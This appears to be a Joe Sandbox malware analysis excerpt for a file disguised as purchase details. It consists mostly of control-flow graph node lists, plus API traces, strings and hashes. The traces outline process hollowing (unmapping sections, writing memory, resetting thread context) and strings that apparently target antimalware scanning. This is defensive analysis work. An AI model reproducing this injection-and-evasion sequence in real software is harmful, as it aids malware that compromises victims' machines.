37805 2b2d164 23 API calls 36836->37805 36837 2b37e54 36844 2b14bcc 11 API calls 36837->36844 36841 2b38a20 36843 2b14860 11 API calls 36841->36843 36842 2b39aef 36846 2b14860 11 API calls 36842->36846 36851 2b38a46 36843->36851 36848 2b37e69 36844->36848 36845 2b14860 11 API calls 36852 2b39839 36845->36852 36853 2b39b10 36846->36853 36850 2b147ec 11 API calls 36847->36850 36849 2b14860 11 API calls 36848->36849 36855 2b37e8a 36849->36855 36857 2b3a009 36850->36857 36854 2b147ec 11 API calls 36851->36854 36858 2b147ec 11 API calls 36852->36858 36856 2b147ec 11 API calls 36853->36856 36862 2b38a7d 36854->36862 36859 2b147ec 11 API calls 36855->36859 36864 2b39b47 36856->36864 36860 2b289d0 20 API calls 36857->36860 36863 2b39870 36858->36863 36867 2b37ec1 36859->36867 36861 2b3a02d 36860->36861 36865 2b14860 11 API calls 36861->36865 36866 2b289d0 20 API calls 36862->36866 36868 2b289d0 20 API calls 36863->36868 36869 2b289d0 20 API calls 36864->36869 36877 2b3a04e 36865->36877 36870 2b38aa1 36866->36870 36874 2b289d0 20 API calls 36867->36874 36871 2b39894 36868->36871 36872 2b39b6b 36869->36872 36873 2b14860 11 API calls 36870->36873 36875 2b14860 11 API calls 36871->36875 36876 2b14860 11 API calls 36872->36876 36880 2b38ac2 36873->36880 36878 2b37ee5 36874->36878 36882 2b398b5 36875->36882 36883 2b39b8c 36876->36883 36879 2b147ec 11 API calls 36877->36879 36881 2b149f8 11 API calls 36878->36881 36890 2b3a085 36879->36890 36886 2b147ec 11 API calls 36880->36886 36884 2b37f02 36881->36884 36888 2b147ec 11 API calls 36882->36888 36889 2b147ec 11 API calls 36883->36889 37803 2b27e50 17 API calls 36884->37803 36893 2b38af9 36886->36893 36887 2b37f08 36891 2b14860 11 API calls 36887->36891 36894 2b398ec 36888->36894 36895 2b39bc3 36889->36895 36892 2b289d0 20 API calls 36890->36892 36897 2b37f29 36891->36897 36900 2b3a0a9 36892->36900 36896 2b289d0 20 API calls 36893->36896 36898 2b289d0 20 API calls 36894->36898 36899 2b289d0 20 API calls 36895->36899 36901 2b38b1d 
36896->36901 36905 2b147ec 11 API calls 36897->36905 36902 2b39910 36898->36902 36903 2b39be7 36899->36903 36908 2b289d0 20 API calls 36900->36908 36904 2b14860 11 API calls 36901->36904 36906 2b14860 11 API calls 36902->36906 36907 2b14860 11 API calls 36903->36907 36909 2b38b3e 36904->36909 36910 2b37f60 36905->36910 36911 2b39931 36906->36911 36912 2b39c08 36907->36912 36913 2b3a0dc 36908->36913 36914 2b147ec 11 API calls 36909->36914 36915 2b289d0 20 API calls 36910->36915 36916 2b147ec 11 API calls 36911->36916 36917 2b147ec 11 API calls 36912->36917 36918 2b289d0 20 API calls 36913->36918 36921 2b38b75 36914->36921 36919 2b37f84 36915->36919 36924 2b39968 36916->36924 36922 2b39c3f 36917->36922 36923 2b3a10f 36918->36923 36920 2b14860 11 API calls 36919->36920 36926 2b37fa5 36920->36926 36925 2b289d0 20 API calls 36921->36925 36928 2b289d0 20 API calls 36922->36928 36929 2b289d0 20 API calls 36923->36929 36927 2b289d0 20 API calls 36924->36927 36930 2b38b99 36925->36930 36935 2b147ec 11 API calls 36926->36935 36931 2b3998c 36927->36931 36932 2b39c63 36928->36932 36942 2b3a142 36929->36942 36933 2b38ba2 36930->36933 36934 2b38bb9 36930->36934 37350 2b2e358 36931->37350 36937 2b14860 11 API calls 36932->36937 37806 2b28730 17 API calls 36933->37806 36939 2b14860 11 API calls 36934->36939 36944 2b37fdc 36935->36944 36946 2b39c84 36937->36946 36948 2b38bda 36939->36948 36941 2b14530 11 API calls 36943 2b399b1 36941->36943 36947 2b289d0 20 API calls 36942->36947 36945 2b14860 11 API calls 36943->36945 36949 2b289d0 20 API calls 36944->36949 36954 2b399d2 36945->36954 36950 2b147ec 11 API calls 36946->36950 36955 2b3a175 36947->36955 36951 2b147ec 11 API calls 36948->36951 36952 2b38000 36949->36952 36958 2b39cbb 36950->36958 36956 2b38c11 36951->36956 36953 2b14860 11 API calls 36952->36953 36960 2b38021 36953->36960 36957 2b147ec 11 API calls 36954->36957 36959 2b289d0 20 API calls 36955->36959 36964 2b289d0 20 API calls 36956->36964 36968 2b39a09 36957->36968 
36962 2b289d0 20 API calls 36958->36962 36961 2b3a1a8 36959->36961 36967 2b147ec 11 API calls 36960->36967 36963 2b14860 11 API calls 36961->36963 36965 2b39cdf 36962->36965 36974 2b3a1c9 36963->36974 36966 2b38c35 36964->36966 37370 2b149f8 36965->37370 36970 2b14860 11 API calls 36966->36970 36976 2b38058 36967->36976 36972 2b289d0 20 API calls 36968->36972 36979 2b38c56 36970->36979 36975 2b39a2d 36972->36975 36978 2b147ec 11 API calls 36974->36978 36977 2b14860 11 API calls 36975->36977 36980 2b289d0 20 API calls 36976->36980 36984 2b39a4e 36977->36984 36985 2b3a200 36978->36985 36981 2b147ec 11 API calls 36979->36981 36982 2b3807c 36980->36982 36988 2b38c8d 36981->36988 36983 2b14860 11 API calls 36982->36983 36989 2b3809d 36983->36989 36986 2b147ec 11 API calls 36984->36986 36987 2b289d0 20 API calls 36985->36987 36996 2b39a85 36986->36996 36990 2b3a224 36987->36990 36991 2b289d0 20 API calls 36988->36991 36994 2b147ec 11 API calls 36989->36994 36992 2b14860 11 API calls 36990->36992 36993 2b38cb1 36991->36993 36998 2b3a245 36992->36998 36995 2b14860 11 API calls 36993->36995 36999 2b380d4 36994->36999 37001 2b38cd2 36995->37001 36997 2b289d0 20 API calls 36996->36997 37007 2b39aa9 36997->37007 37000 2b147ec 11 API calls 36998->37000 37002 2b289d0 20 API calls 36999->37002 37006 2b3a27c 37000->37006 37003 2b147ec 11 API calls 37001->37003 37004 2b380f8 37002->37004 37010 2b38d09 37003->37010 37804 2b2b118 39 API calls 37004->37804 37009 2b289d0 20 API calls 37006->37009 37355 2b2dc8c 37007->37355 37015 2b3a2a0 37009->37015 37012 2b289d0 20 API calls 37010->37012 37011 2b38109 37013 2b38d2d ResumeThread 37012->37013 37014 2b14860 11 API calls 37013->37014 37019 2b38d59 37014->37019 37016 2b289d0 20 API calls 37015->37016 37017 2b3a2d3 37016->37017 37018 2b14860 11 API calls 37017->37018 37021 2b3a2f4 37018->37021 37020 2b147ec 11 API calls 37019->37020 37023 2b38d90 37020->37023 37022 2b147ec 11 API calls 37021->37022 37026 2b3a32b 37022->37026 37024 2b289d0 
20 API calls 37023->37024 37025 2b38db4 37024->37025 37027 2b14860 11 API calls 37025->37027 37028 2b289d0 20 API calls 37026->37028 37031 2b38dd5 37027->37031 37029 2b3a34f 37028->37029 37030 2b14860 11 API calls 37029->37030 37033 2b3a370 37030->37033 37032 2b147ec 11 API calls 37031->37032 37035 2b38e0c 37032->37035 37034 2b147ec 11 API calls 37033->37034 37038 2b3a3a7 37034->37038 37036 2b289d0 20 API calls 37035->37036 37037 2b38e30 37036->37037 37039 2b14860 11 API calls 37037->37039 37040 2b289d0 20 API calls 37038->37040 37042 2b38e51 37039->37042 37041 2b3a3cb 37040->37041 37043 2b14860 11 API calls 37041->37043 37044 2b147ec 11 API calls 37042->37044 37045 2b3a3ec 37043->37045 37047 2b38e88 37044->37047 37046 2b147ec 11 API calls 37045->37046 37050 2b3a423 37046->37050 37048 2b289d0 20 API calls 37047->37048 37049 2b38eac CloseHandle 37048->37049 37051 2b14860 11 API calls 37049->37051 37052 2b289d0 20 API calls 37050->37052 37053 2b38ed8 37051->37053 37055 2b3a447 37052->37055 37054 2b147ec 11 API calls 37053->37054 37057 2b38f0f 37054->37057 37056 2b289d0 20 API calls 37055->37056 37058 2b3a47a 37056->37058 37059 2b289d0 20 API calls 37057->37059 37061 2b289d0 20 API calls 37058->37061 37060 2b38f33 37059->37060 37062 2b14860 11 API calls 37060->37062 37063 2b3a4ad 37061->37063 37064 2b38f54 37062->37064 37065 2b289d0 20 API calls 37063->37065 37066 2b147ec 11 API calls 37064->37066 37067 2b3a4e0 37065->37067 37068 2b38f8b 37066->37068 37069 2b289d0 20 API calls 37067->37069 37070 2b289d0 20 API calls 37068->37070 37071 2b3a513 37069->37071 37072 2b38faf 37070->37072 37073 2b14860 11 API calls 37071->37073 37074 2b14860 11 API calls 37072->37074 37075 2b3a534 37073->37075 37076 2b38fd0 37074->37076 37077 2b147ec 11 API calls 37075->37077 37078 2b147ec 11 API calls 37076->37078 37080 2b3a56b 37077->37080 37079 2b39007 37078->37079 37082 2b289d0 20 API calls 37079->37082 37081 2b289d0 20 API calls 37080->37081 37083 2b3a58f 37081->37083 37084 2b3902b 
37082->37084 37085 2b14860 11 API calls 37083->37085 37086 2b14860 11 API calls 37084->37086 37087 2b3a5b0 37085->37087 37088 2b3904c 37086->37088 37089 2b147ec 11 API calls 37087->37089 37090 2b147ec 11 API calls 37088->37090 37091 2b3a5e7 37089->37091 37092 2b39083 37090->37092 37094 2b289d0 20 API calls 37091->37094 37093 2b289d0 20 API calls 37092->37093 37095 2b390a7 37093->37095 37097 2b3a60b 37094->37097 37096 2b14860 11 API calls 37095->37096 37099 2b390c8 37096->37099 37098 2b289d0 20 API calls 37097->37098 37101 2b3a63e 37098->37101 37100 2b147ec 11 API calls 37099->37100 37103 2b390ff 37100->37103 37102 2b289d0 20 API calls 37101->37102 37107 2b3a671 37102->37107 37104 2b289d0 20 API calls 37103->37104 37105 2b39123 37104->37105 37106 2b14860 11 API calls 37105->37106 37109 2b39144 37106->37109 37108 2b289d0 20 API calls 37107->37108 37110 2b3a6a4 37108->37110 37111 2b147ec 11 API calls 37109->37111 37112 2b289d0 20 API calls 37110->37112 37113 2b3917b 37111->37113 37114 2b3a6d7 37112->37114 37115 2b289d0 20 API calls 37113->37115 37117 2b289d0 20 API calls 37114->37117 37116 2b3919f 37115->37116 37118 2b14860 11 API calls 37116->37118 37119 2b3a70a 37117->37119 37121 2b391c0 37118->37121 37120 2b14860 11 API calls 37119->37120 37122 2b3a72b 37120->37122 37123 2b147ec 11 API calls 37121->37123 37124 2b147ec 11 API calls 37122->37124 37125 2b391f7 37123->37125 37126 2b3a762 37124->37126 37127 2b289d0 20 API calls 37125->37127 37129 2b289d0 20 API calls 37126->37129 37128 2b3921b 37127->37128 37807 2b2894c LoadLibraryW 37128->37807 37130 2b3a786 37129->37130 37131 2b14860 11 API calls 37130->37131 37136 2b3a7a7 37131->37136 37134 2b2894c 21 API calls 37135 2b3924e 37134->37135 37137 2b2894c 21 API calls 37135->37137 37139 2b147ec 11 API calls 37136->37139 37138 2b39262 37137->37138 37140 2b2894c 21 API calls 37138->37140 37144 2b3a7de 37139->37144 37141 2b39276 37140->37141 37142 2b2894c 21 API calls 37141->37142 37143 2b3928a 37142->37143 37145 2b2894c 21 
API calls 37143->37145 37147 2b289d0 20 API calls 37144->37147 37146 2b3929e CloseHandle 37145->37146 37148 2b14860 11 API calls 37146->37148 37149 2b3a802 37147->37149 37151 2b392ca 37148->37151 37150 2b14860 11 API calls 37149->37150 37153 2b3a823 37150->37153 37152 2b147ec 11 API calls 37151->37152 37155 2b39301 37152->37155 37154 2b147ec 11 API calls 37153->37154 37156 2b3a85a 37154->37156 37157 2b289d0 20 API calls 37155->37157 37159 2b289d0 20 API calls 37156->37159 37158 2b39325 37157->37158 37160 2b14860 11 API calls 37158->37160 37161 2b3a87e 37159->37161 37163 2b39346 37160->37163 37162 2b14860 11 API calls 37161->37162 37164 2b3a89f 37162->37164 37165 2b147ec 11 API calls 37163->37165 37166 2b147ec 11 API calls 37164->37166 37167 2b3937d 37165->37167 37168 2b3a8d6 37166->37168 37169 2b289d0 20 API calls 37167->37169 37170 2b289d0 20 API calls 37168->37170 37169->36626 37171 2b3a8fa 37170->37171 37172 2b14860 11 API calls 37171->37172 37173 2b3a91b 37172->37173 37174 2b147ec 11 API calls 37173->37174 37175 2b3a952 37174->37175 37176 2b289d0 20 API calls 37175->37176 37177 2b3a976 37176->37177 37178 2b289d0 20 API calls 37177->37178 37179 2b3a985 37178->37179 37180 2b289d0 20 API calls 37179->37180 37181 2b3a994 37180->37181 37182 2b289d0 20 API calls 37181->37182 37183 2b3a9a3 37182->37183 37184 2b289d0 20 API calls 37183->37184 37185 2b3a9b2 37184->37185 37186 2b289d0 20 API calls 37185->37186 37187 2b3a9c1 37186->37187 37188 2b289d0 20 API calls 37187->37188 37189 2b3a9d0 37188->37189 37190 2b289d0 20 API calls 37189->37190 37191 2b3a9df 37190->37191 37192 2b289d0 20 API calls 37191->37192 37193 2b3a9ee 37192->37193 37194 2b289d0 20 API calls 37193->37194 37195 2b3a9fd 37194->37195 37196 2b289d0 20 API calls 37195->37196 37197 2b3aa0c 37196->37197 37198 2b289d0 20 API calls 37197->37198 37199 2b3aa1b 37198->37199 37200 2b289d0 20 API calls 37199->37200 37201 2b3aa2a 37200->37201 37202 2b289d0 20 API calls 37201->37202 37203 2b3aa39 37202->37203 37204 
2b289d0 20 API calls 37203->37204 37205 2b3aa48 37204->37205 37206 2b289d0 20 API calls 37205->37206 37207 2b3aa57 37206->37207 37208 2b14860 11 API calls 37207->37208 37209 2b3aa78 37208->37209 37210 2b147ec 11 API calls 37209->37210 37211 2b3aaaf 37210->37211 37212 2b289d0 20 API calls 37211->37212 37213 2b3aad3 37212->37213 37214 2b289d0 20 API calls 37213->37214 37215 2b3ab06 37214->37215 37216 2b289d0 20 API calls 37215->37216 37217 2b3ab39 37216->37217 37218 2b289d0 20 API calls 37217->37218 37219 2b3ab6c 37218->37219 37220 2b289d0 20 API calls 37219->37220 37221 2b3ab9f 37220->37221 37222 2b289d0 20 API calls 37221->37222 37223 2b3abd2 37222->37223 37224 2b289d0 20 API calls 37223->37224 37225 2b3ac05 37224->37225 37226 2b289d0 20 API calls 37225->37226 37227 2b3ac38 37226->37227 37228 2b14860 11 API calls 37227->37228 37229 2b3ac59 37228->37229 37230 2b147ec 11 API calls 37229->37230 37231 2b3ac90 37230->37231 37232 2b289d0 20 API calls 37231->37232 37233 2b3acb4 37232->37233 37234 2b14860 11 API calls 37233->37234 37235 2b3acd5 37234->37235 37236 2b147ec 11 API calls 37235->37236 37237 2b3ad0c 37236->37237 37238 2b289d0 20 API calls 37237->37238 37239 2b3ad30 37238->37239 37240 2b14860 11 API calls 37239->37240 37241 2b3ad51 37240->37241 37242 2b147ec 11 API calls 37241->37242 37243 2b3ad88 37242->37243 37244 2b289d0 20 API calls 37243->37244 37245 2b3adac 37244->37245 37246 2b289d0 20 API calls 37245->37246 37247 2b3addf 37246->37247 37248 2b289d0 20 API calls 37247->37248 37249 2b3ae12 37248->37249 37250 2b289d0 20 API calls 37249->37250 37251 2b3ae45 37250->37251 37252 2b289d0 20 API calls 37251->37252 37253 2b3ae78 37252->37253 37254 2b289d0 20 API calls 37253->37254 37255 2b3aeab 37254->37255 37256 2b289d0 20 API calls 37255->37256 37257 2b3aede 37256->37257 37258 2b289d0 20 API calls 37257->37258 37259 2b3af11 37258->37259 37260 2b289d0 20 API calls 37259->37260 37261 2b3af44 37260->37261 37262 2b289d0 20 API calls 37261->37262 37263 2b3af77 
37262->37263 37264 2b289d0 20 API calls 37263->37264 37265 2b3afaa 37264->37265 37266 2b289d0 20 API calls 37265->37266 37267 2b3afdd 37266->37267 37268 2b289d0 20 API calls 37267->37268 37269 2b3b010 37268->37269 37270 2b289d0 20 API calls 37269->37270 37271 2b3b043 37270->37271 37272 2b289d0 20 API calls 37271->37272 37273 2b3b076 37272->37273 37274 2b289d0 20 API calls 37273->37274 37275 2b3b0a9 37274->37275 37276 2b289d0 20 API calls 37275->37276 37277 2b3b0dc 37276->37277 37278 2b289d0 20 API calls 37277->37278 37279 2b3b10f 37278->37279 37280 2b289d0 20 API calls 37279->37280 37281 2b3b142 37280->37281 37282 2b289d0 20 API calls 37281->37282 37283 2b3b175 37282->37283 37777 2b28338 37283->37777 37286 2b14860 11 API calls 37287 2b3b1a5 37286->37287 37288 2b147ec 11 API calls 37287->37288 37289 2b3b1dc 37288->37289 37290 2b289d0 20 API calls 37289->37290 37291 2b3b200 37290->37291 37292 2b14860 11 API calls 37291->37292 37293 2b3b221 37292->37293 37294 2b147ec 11 API calls 37293->37294 37295 2b3b258 37294->37295 37296 2b289d0 20 API calls 37295->37296 37297 2b3b27c 37296->37297 37298 2b14860 11 API calls 37297->37298 37299 2b3b29d 37298->37299 37300 2b147ec 11 API calls 37299->37300 37301 2b3b2d4 37300->37301 37302 2b289d0 20 API calls 37301->37302 37303 2b3b2f8 ExitProcess 37302->37303 37305 2b289e4 37304->37305 37306 2b281cc 17 API calls 37305->37306 37307 2b28a1d 37306->37307 37308 2b28274 15 API calls 37307->37308 37309 2b28a36 37308->37309 37310 2b27d78 18 API calls 37309->37310 37311 2b28a95 37310->37311 37312 2b28338 18 API calls 37311->37312 37313 2b28aa4 FreeLibrary 37312->37313 37314 2b28abc 37313->37314 37315 2b14500 11 API calls 37314->37315 37316 2b28ac9 37315->37316 37316->36490 37324 2b2e114 37317->37324 37318 2b2e197 37319 2b144dc 11 API calls 37318->37319 37321 2b2e19f 37319->37321 37320 2b149f8 11 API calls 37320->37324 37322 2b14530 11 API calls 37321->37322 37323 2b2e1aa 37322->37323 37325 2b14500 11 API calls 37323->37325 37324->37318 
37324->37320 37326 2b2e1c4 37325->37326 37326->36517 37328 2b2f22b 37327->37328 37329 2b2f256 RegOpenKeyA 37328->37329 37330 2b2f264 37329->37330 37331 2b149f8 11 API calls 37330->37331 37332 2b2f27c 37331->37332 37333 2b2f289 RegSetValueExA RegCloseKey 37332->37333 37334 2b2f2ad 37333->37334 37335 2b14500 11 API calls 37334->37335 37336 2b2f2ba 37335->37336 37337 2b144dc 11 API calls 37336->37337 37338 2b2f2c2 37337->37338 37338->36520 37340 2b2f0b9 37339->37340 37341 2b2f0e5 37340->37341 37814 2b146c4 11 API calls 37340->37814 37815 2b14530 11 API calls 37340->37815 37342 2b144dc 11 API calls 37341->37342 37344 2b2f0fa 37342->37344 37344->36778 37816 2b149a0 37346->37816 37349 2b17e71 37349->36842 37349->36845 37351 2b14bcc 11 API calls 37350->37351 37353 2b2e370 37351->37353 37352 2b2e391 37352->36941 37353->37352 37354 2b149f8 11 API calls 37353->37354 37354->37353 37356 2b2dca2 37355->37356 37818 2b14f20 37356->37818 37358 2b2dcaa 37359 2b2dcca RtlDosPathNameToNtPathName_U 37358->37359 37822 2b2dbdc 37359->37822 37361 2b2dce6 NtCreateFile 37362 2b2dd11 37361->37362 37363 2b149f8 11 API calls 37362->37363 37364 2b2dd23 NtWriteFile NtClose 37363->37364 37365 2b2dd4d 37364->37365 37823 2b14c60 37365->37823 37368 2b144dc 11 API calls 37369 2b2dd5d 37368->37369 37369->36842 37371 2b149ac 37370->37371 37372 2b149e7 37371->37372 37373 2b145a0 11 API calls 37371->37373 37376 2b28d70 37372->37376 37374 2b149c3 37373->37374 37374->37372 37375 2b12c2c 11 API calls 37374->37375 37375->37372 37377 2b28d78 37376->37377 37378 2b14860 11 API calls 37377->37378 37379 2b28dbb 37378->37379 37380 2b147ec 11 API calls 37379->37380 37381 2b28de0 37380->37381 37382 2b289d0 20 API calls 37381->37382 37383 2b28dfb 37382->37383 37384 2b14860 11 API calls 37383->37384 37385 2b28e14 37384->37385 37386 2b147ec 11 API calls 37385->37386 37387 2b28e39 37386->37387 37388 2b289d0 20 API calls 37387->37388 37389 2b28e54 37388->37389 37390 2b2a8b7 37389->37390 37391 2b14860 11 API calls 
37389->37391 37392 2b14500 11 API calls 37390->37392 37396 2b28e85 37391->37396 37393 2b2a8d4 37392->37393 37394 2b14500 11 API calls 37393->37394 37395 2b2a8e4 37394->37395 37397 2b14c60 SysFreeString 37395->37397 37399 2b147ec 11 API calls 37396->37399 37398 2b2a8ef 37397->37398 37400 2b14500 11 API calls 37398->37400 37403 2b28eaa 37399->37403 37401 2b2a8ff 37400->37401 37402 2b144dc 11 API calls 37401->37402 37404 2b2a907 37402->37404 37406 2b289d0 20 API calls 37403->37406 37405 2b14500 11 API calls 37404->37405 37407 2b2a914 37405->37407 37408 2b28ec5 37406->37408 37409 2b14500 11 API calls 37407->37409 37411 2b14860 11 API calls 37408->37411 37410 2b2a921 37409->37410 37410->36688 37412 2b28ede 37411->37412 37413 2b147ec 11 API calls 37412->37413 37414 2b28f03 37413->37414 37415 2b289d0 20 API calls 37414->37415 37416 2b28f1e 37415->37416 37416->37390 37417 2b14860 11 API calls 37416->37417 37418 2b28f66 37417->37418 37419 2b147ec 11 API calls 37418->37419 37420 2b28f8b 37419->37420 37421 2b289d0 20 API calls 37420->37421 37422 2b28fa6 37421->37422 37423 2b14860 11 API calls 37422->37423 37424 2b28fbf 37423->37424 37425 2b147ec 11 API calls 37424->37425 37426 2b28fe4 37425->37426 37427 2b289d0 20 API calls 37426->37427 37428 2b28fff 37427->37428 37429 2b14860 11 API calls 37428->37429 37430 2b29044 37429->37430 37431 2b147ec 11 API calls 37430->37431 37432 2b29069 37431->37432 37433 2b289d0 20 API calls 37432->37433 37434 2b29084 37433->37434 37435 2b14860 11 API calls 37434->37435 37436 2b2909d 37435->37436 37437 2b147ec 11 API calls 37436->37437 37438 2b290c5 37437->37438 37439 2b289d0 20 API calls 37438->37439 37440 2b290e3 37439->37440 37441 2b14860 11 API calls 37440->37441 37442 2b290ff 37441->37442 37443 2b147ec 11 API calls 37442->37443 37444 2b29130 37443->37444 37445 2b289d0 20 API calls 37444->37445 37446 2b29154 37445->37446 37447 2b14860 11 API calls 37446->37447 37448 2b29170 37447->37448 37449 2b147ec 11 API calls 37448->37449 37450 2b291a1 

Control-flow Graph
APIs
  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
  • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
• GetThreadContext.KERNEL32(00000920,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
  • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
  • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
  • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
• SetThreadContext.KERNEL32(00000920,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,0000091C,002A4FF8,02B974FC,00000004,02B97500), ref: 02B2A317
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000920,00000000,00000920,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,0000091C,002A4FF8,02B974FC), ref: 02B2A324
  • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
  • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
  • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                          • API String ID: 2388221946-51457883
                                                                                                                                                                                                                          • Opcode ID: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                                                                                                                          • Instruction ID: d31b7ef75b706298cf3e94f47eca147920a51754cd1f8958eb4517a3c0f01932
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30E2E175A502289FDB11FB64DD80BCE73BAAF85300F9041F1E149AB215DE30AE89DF56

Control-flow Graph
• Graph image not reproduced (function at 2b28d6e; API calls that appear in the graph: GetThreadContext, SetThreadContext, NtResumeThread)
APIs
  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
  • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
• GetThreadContext.KERNEL32(00000920,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
  • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
  • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
  • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 3386062106-51457883
• Opcode ID: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
• Instruction ID: b3f93cdda9a590f44b4faf4aaec77923743a965370e8e6dd3ad7c23c9ac1f0af
• Opcode Fuzzy Hash: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
• Instruction Fuzzy Hash: 4CE2D175A502289FDB11FB64DD80BCE73BAEF85300F9041E1E149AB215DE30AE89DF56

Control-flow Graph
• Graph image not reproduced (function at 2b15acc; API calls that appear in the graph: GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpynA, GetThreadLocale, GetLocaleInfoA, lstrlenA, LoadLibraryExA)
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
